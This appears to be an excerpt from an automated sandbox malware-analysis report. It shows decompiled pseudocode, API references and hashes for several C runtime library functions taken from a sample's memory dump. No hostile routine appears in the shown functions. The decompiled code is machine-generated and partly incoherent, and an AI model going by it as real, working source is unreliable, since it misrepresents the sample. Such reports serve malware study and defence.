                                                                                                                                                                                            • Instruction ID: 294d9a006d07348d642296dff87903f653bc2266be36b3f99c490e8fcacd99f6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2770ef3dcfecd0b1492965f7a63133527a082a5cc30f678bfd48e2f5a3335974
                                                                                                                                                                                            • Instruction Fuzzy Hash: F89002602511058AC60097707C0AE456A905A4D60675285B1A502D4498DEB480505529
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0041B9A3 Relevance: .4, Instructions: 430COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d054b4bc810bef23acd84e13e871caec40518e2601be87026a964eb4790cd668
                                                                                                                                                                                            • Instruction ID: 8665d99470cc837292e785960ffe5a28c457489d2829d946bb37367926bcfc73
                                                                                                                                                                                            • Opcode Fuzzy Hash: d054b4bc810bef23acd84e13e871caec40518e2601be87026a964eb4790cd668
                                                                                                                                                                                            • Instruction Fuzzy Hash: AD02E06144E3C29FCB134BB48CB51D1BFB19E5721471E48DBC0C08F4A7E25A299ADB63
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00414154 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                                            • Instruction ID: 6ec59a09f4bf7ab3ef9f3fb5cfa828d04e8f9faf371d54d466a840b16c525f68
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73E0DF36650104ABC7219A0AD804CC3FBE9EBE87B07094426E94893620C234FC80C6D4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00407E7D Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                            			E00407E7D(intOrPtr __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x412638);
				E004082E4(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00406F90(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x4111c0;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = __imp__GetProcAddress; // 0x76684ee0
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x436d40;
				E0040A28A(_t35, 1, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t14 = _t46 + 0x68; // 0x44e8968
				InterlockedIncrement( *_t14);
				 *(_t47 - 4) = 0xfffffffe;
				E00407F52();
				E0040A28A(_t35, 1, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x437348; // 0x437270
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				_t20 = _t46 + 0x6c; // 0xd3b0e8b
				E00409199( *_t20);
				 *(_t47 - 4) = 0xfffffffe;
				return E00408329(E00407F5B());
			}








                                                                                                                                                                                            0x00407e7d
                                                                                                                                                                                            0x00407e7d
                                                                                                                                                                                            0x00407e7f
                                                                                                                                                                                            0x00407e84
                                                                                                                                                                                            0x00407e89
                                                                                                                                                                                            0x00407e8f
                                                                                                                                                                                            0x00407e97
                                                                                                                                                                                            0x00407e9a
                                                                                                                                                                                            0x00407e9f
                                                                                                                                                                                            0x00407ea0
                                                                                                                                                                                            0x00407ea3
                                                                                                                                                                                            0x00407ea6
                                                                                                                                                                                            0x00407eb0
                                                                                                                                                                                            0x00407eb5
                                                                                                                                                                                            0x00407ebd
                                                                                                                                                                                            0x00407ec5
                                                                                                                                                                                            0x00407ed5
                                                                                                                                                                                            0x00407ed5
                                                                                                                                                                                            0x00407edb
                                                                                                                                                                                            0x00407ede
                                                                                                                                                                                            0x00407ee5
                                                                                                                                                                                            0x00407eec
                                                                                                                                                                                            0x00407ef5
                                                                                                                                                                                            0x00407efb
                                                                                                                                                                                            0x00407eff
                                                                                                                                                                                            0x00407f02
                                                                                                                                                                                            0x00407f08
                                                                                                                                                                                            0x00407f0f
                                                                                                                                                                                            0x00407f16
                                                                                                                                                                                            0x00407f1c
                                                                                                                                                                                            0x00407f1f
                                                                                                                                                                                            0x00407f22
                                                                                                                                                                                            0x00407f27
                                                                                                                                                                                            0x00407f29
                                                                                                                                                                                            0x00407f2e
                                                                                                                                                                                            0x00407f2e
                                                                                                                                                                                            0x00407f31
                                                                                                                                                                                            0x00407f34
                                                                                                                                                                                            0x00407f3a
                                                                                                                                                                                            0x00407f4b

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00412638,0000000C,00407FB8,00000000,00000000,?,004062E5,00409C9A,004088A8,?,?,004062E5,00403150,?,00403150), ref: 00407E8F
                                                                                                                                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00407E9A
                                                                                                                                                                                              • Part of subcall function 00406F90: Sleep.KERNEL32(000003E8,?,?,00407DE0,KERNEL32.DLL,?,004088D2,?,004088A2,004062E5,?,?,004062E5,00403150,?,00403150), ref: 00406F9C
                                                                                                                                                                                              • Part of subcall function 00406F90: GetModuleHandleW.KERNEL32(004062E5,?,?,00407DE0,KERNEL32.DLL,?,004088D2,?,004088A2,004062E5,?,?,004062E5,00403150,?,00403150), ref: 00406FA5
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00407EC3
                                                                                                                                                                                            • GetProcAddress.KERNEL32(004062E5,DecodePointer), ref: 00407ED3
                                                                                                                                                                                            • __lock.LIBCMT ref: 00407EF5
                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(044E8968), ref: 00407F02
                                                                                                                                                                                            • __lock.LIBCMT ref: 00407F16
                                                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 00407F34
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL$prC$NhvIhvPdhv
                                                                                                                                                                                            • API String ID: 1028249917-2477794846
                                                                                                                                                                                            • Opcode ID: 47dc7fda2f7a2cb09fb3ee480cc7d676d4fb3dc5c517a09c794278a1ce4d92c8
                                                                                                                                                                                            • Instruction ID: 29a568a171ab08e2388afc4a227a9271e662036cda5a420f3950e154490123b6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 47dc7fda2f7a2cb09fb3ee480cc7d676d4fb3dc5c517a09c794278a1ce4d92c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA116071945701AED720EF66D801B8ABBE0AF04314F10856FE999A62E0CBB8A940CF5D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406F17 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                            			E00406F17() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x410ba0;
					_v28 =  *0x410b98;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                                                            0x00406f1c
                                                                                                                                                                                            0x00406f24
                                                                                                                                                                                            0x00406f3b
                                                                                                                                                                                            0x00406ee7
                                                                                                                                                                                            0x00406ef0
                                                                                                                                                                                            0x00406efc
                                                                                                                                                                                            0x00406eff
                                                                                                                                                                                            0x00406f02
                                                                                                                                                                                            0x00406f04
                                                                                                                                                                                            0x00406f07
                                                                                                                                                                                            0x00406f0c
                                                                                                                                                                                            0x00406f16
                                                                                                                                                                                            0x00406f0e
                                                                                                                                                                                            0x00406f12
                                                                                                                                                                                            0x00406f12
                                                                                                                                                                                            0x00406f26
                                                                                                                                                                                            0x00406f2c
                                                                                                                                                                                            0x00406f34
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406f36
                                                                                                                                                                                            0x00406f36
                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                            0x00406f34

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004060C3), ref: 00406F1C
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00406F2C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32$NhvIhvPdhv
                                                                                                                                                                                            • API String ID: 1646373207-5371
                                                                                                                                                                                            • Opcode ID: 2141e8ee2b66fab69cba99115582389957fcbaafff06d0f330f51a4c95b03ee9
                                                                                                                                                                                            • Instruction ID: 414584f383310722c69b18f9f881d68931b6d9a34a445ea62bf295b524f4021f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2141e8ee2b66fab69cba99115582389957fcbaafff06d0f330f51a4c95b03ee9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF03030A04A0AD2DB006BE5BD1A7AF7A78BB94746F9204A1A1D6B00C4DFB490B5C24A
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004092FF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                            			E004092FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x412708);
				E004082E4(__ebx, __edi, __esi);
				_t29 = E00407FDD(__ebx, _t31);
				_t13 =  *0x437264; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E0040A28A(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x437348; // 0x437270
					 *((intOrPtr*)(_t30 - 0x1c)) = E004092C1(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00409369();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00407FDD(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00406FC0(_t25, 0x20);
				}
				return E00408329(_t29);
			}









                                                                                                                                                                                            0x004092ff
                                                                                                                                                                                            0x004092ff
                                                                                                                                                                                            0x004092ff
                                                                                                                                                                                            0x004092ff
                                                                                                                                                                                            0x004092ff
                                                                                                                                                                                            0x00409301
                                                                                                                                                                                            0x00409306
                                                                                                                                                                                            0x00409310
                                                                                                                                                                                            0x00409312
                                                                                                                                                                                            0x0040931a
                                                                                                                                                                                            0x0040933e
                                                                                                                                                                                            0x00409340
                                                                                                                                                                                            0x00409346
                                                                                                                                                                                            0x0040934a
                                                                                                                                                                                            0x0040934d
                                                                                                                                                                                            0x00409358
                                                                                                                                                                                            0x0040935b
                                                                                                                                                                                            0x00409362
                                                                                                                                                                                            0x0040931c
                                                                                                                                                                                            0x0040931c
                                                                                                                                                                                            0x00409320
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00409322
                                                                                                                                                                                            0x00409327
                                                                                                                                                                                            0x00409327
                                                                                                                                                                                            0x00409320
                                                                                                                                                                                            0x0040932c
                                                                                                                                                                                            0x00409330
                                                                                                                                                                                            0x00409335
                                                                                                                                                                                            0x0040933d

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __getptd.LIBCMT ref: 0040930B
                                                                                                                                                                                              • Part of subcall function 00407FDD: __getptd_noexit.LIBCMT ref: 00407FE0
                                                                                                                                                                                              • Part of subcall function 00407FDD: __amsg_exit.LIBCMT ref: 00407FED
                                                                                                                                                                                            • __getptd.LIBCMT ref: 00409322
                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00409330
                                                                                                                                                                                            • __lock.LIBCMT ref: 00409340
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                            • String ID: prC
                                                                                                                                                                                            • API String ID: 3521780317-1500297756
                                                                                                                                                                                            • Opcode ID: 07a6c897102de750e18d87a46b55e8324a9b223051407a1497b7d71d25a26732
                                                                                                                                                                                            • Instruction ID: 4b365dda81fc10f29cd4daaa35ee56ed22762d8e3948514f3b24d74fb2f196eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 07a6c897102de750e18d87a46b55e8324a9b223051407a1497b7d71d25a26732
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F01D31A48705DBD630BBA6850274A73A06B04728F11857FF890B72D3CB7C9D41DE5E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00408B93 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                            			E00408B93(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x4126c8);
				E004082E4(__ebx, __edi, __esi);
				_t31 = E00407FDD(__ebx, _t35);
				_t15 =  *0x437264; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040A28A(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x437168; // 0x2301610
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x436d40;
								if(__eflags != 0) {
									_push(_t33);
									E0040A989(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x437168; // 0x2301610
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x437168; // 0x2301610
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00408C2E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00406FC0(_t29, 0x20);
				}
				return E00408329(_t33);
			}











                                                                                                                                                                                            0x00408b93
                                                                                                                                                                                            0x00408b93
                                                                                                                                                                                            0x00408b93
                                                                                                                                                                                            0x00408b93
                                                                                                                                                                                            0x00408b95
                                                                                                                                                                                            0x00408b9a
                                                                                                                                                                                            0x00408ba4
                                                                                                                                                                                            0x00408ba6
                                                                                                                                                                                            0x00408bae
                                                                                                                                                                                            0x00408bcf
                                                                                                                                                                                            0x00408bd5
                                                                                                                                                                                            0x00408bd9
                                                                                                                                                                                            0x00408bdc
                                                                                                                                                                                            0x00408bdf
                                                                                                                                                                                            0x00408be5
                                                                                                                                                                                            0x00408be7
                                                                                                                                                                                            0x00408be9
                                                                                                                                                                                            0x00408bec
                                                                                                                                                                                            0x00408bf2
                                                                                                                                                                                            0x00408bf4
                                                                                                                                                                                            0x00408bf6
                                                                                                                                                                                            0x00408bfc
                                                                                                                                                                                            0x00408bfe
                                                                                                                                                                                            0x00408bff
                                                                                                                                                                                            0x00408c04
                                                                                                                                                                                            0x00408bfc
                                                                                                                                                                                            0x00408bf4
                                                                                                                                                                                            0x00408c05
                                                                                                                                                                                            0x00408c0a
                                                                                                                                                                                            0x00408c0d
                                                                                                                                                                                            0x00408c13
                                                                                                                                                                                            0x00408c17
                                                                                                                                                                                            0x00408c17
                                                                                                                                                                                            0x00408c1d
                                                                                                                                                                                            0x00408c24
                                                                                                                                                                                            0x00408bb6
                                                                                                                                                                                            0x00408bb6
                                                                                                                                                                                            0x00408bb6
                                                                                                                                                                                            0x00408bbb
                                                                                                                                                                                            0x00408bbf
                                                                                                                                                                                            0x00408bc4
                                                                                                                                                                                            0x00408bcc

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __getptd.LIBCMT ref: 00408B9F
                                                                                                                                                                                              • Part of subcall function 00407FDD: __getptd_noexit.LIBCMT ref: 00407FE0
                                                                                                                                                                                              • Part of subcall function 00407FDD: __amsg_exit.LIBCMT ref: 00407FED
                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00408BBF
                                                                                                                                                                                            • __lock.LIBCMT ref: 00408BCF
                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00408BEC
                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(02301610), ref: 00408C17
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4271482742-0
                                                                                                                                                                                            • Opcode ID: 6d90e189aaf73bd74ff76e928004a0f36092a6cdf6b5a25c5694984172ad263c
                                                                                                                                                                                            • Instruction ID: 3c96cca1601acfa5e44c84fa2913d418f045535533671cac7f11ee448469f361
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d90e189aaf73bd74ff76e928004a0f36092a6cdf6b5a25c5694984172ad263c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B017C72905B119BEB21AB269A0575A7770AB04724F05403FF890773D0CF7C6981CEAE
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040A989 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 43%
                                                                                                                                                                                            			E0040A989(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x4127c8);
				_t8 = E004082E4(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E00408329(_t8);
				}
				if( *0x4386b4 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x438074, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00409C95(_t31);
						 *_t10 = E00409C53(GetLastError());
					}
					goto L9;
				}
				E0040A28A(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0040AED5(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040AF05();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0040A9DF();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                                                                            0x0040a989
                                                                                                                                                                                            0x0040a98b
                                                                                                                                                                                            0x0040a990
                                                                                                                                                                                            0x0040a995
                                                                                                                                                                                            0x0040a99a
                                                                                                                                                                                            0x0040aa11
                                                                                                                                                                                            0x0040aa16
                                                                                                                                                                                            0x0040aa16
                                                                                                                                                                                            0x0040a9a3
                                                                                                                                                                                            0x0040a9e8
                                                                                                                                                                                            0x0040a9e9
                                                                                                                                                                                            0x0040a9f1
                                                                                                                                                                                            0x0040a9f7
                                                                                                                                                                                            0x0040a9f9
                                                                                                                                                                                            0x0040a9fb
                                                                                                                                                                                            0x0040aa0e
                                                                                                                                                                                            0x0040aa10
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040a9f9
                                                                                                                                                                                            0x0040a9a7
                                                                                                                                                                                            0x0040a9ad
                                                                                                                                                                                            0x0040a9b2
                                                                                                                                                                                            0x0040a9b8
                                                                                                                                                                                            0x0040a9bd
                                                                                                                                                                                            0x0040a9bf
                                                                                                                                                                                            0x0040a9c0
                                                                                                                                                                                            0x0040a9c1
                                                                                                                                                                                            0x0040a9c7
                                                                                                                                                                                            0x0040a9c8
                                                                                                                                                                                            0x0040a9cf
                                                                                                                                                                                            0x0040a9d8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040a9da
                                                                                                                                                                                            0x0040a9da
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040a9da

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __lock.LIBCMT ref: 0040A9A7
                                                                                                                                                                                              • Part of subcall function 0040A28A: __mtinitlocknum.LIBCMT ref: 0040A2A0
                                                                                                                                                                                              • Part of subcall function 0040A28A: __amsg_exit.LIBCMT ref: 0040A2AC
                                                                                                                                                                                              • Part of subcall function 0040A28A: EnterCriticalSection.KERNEL32(?,?,?,0040EB16,00000004,00412848,0000000C,0040AA72,004062E5,?,00000000,00000000,00000000,?,00407F8F,00000001), ref: 0040A2B4
                                                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 0040A9B2
                                                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 0040A9C1
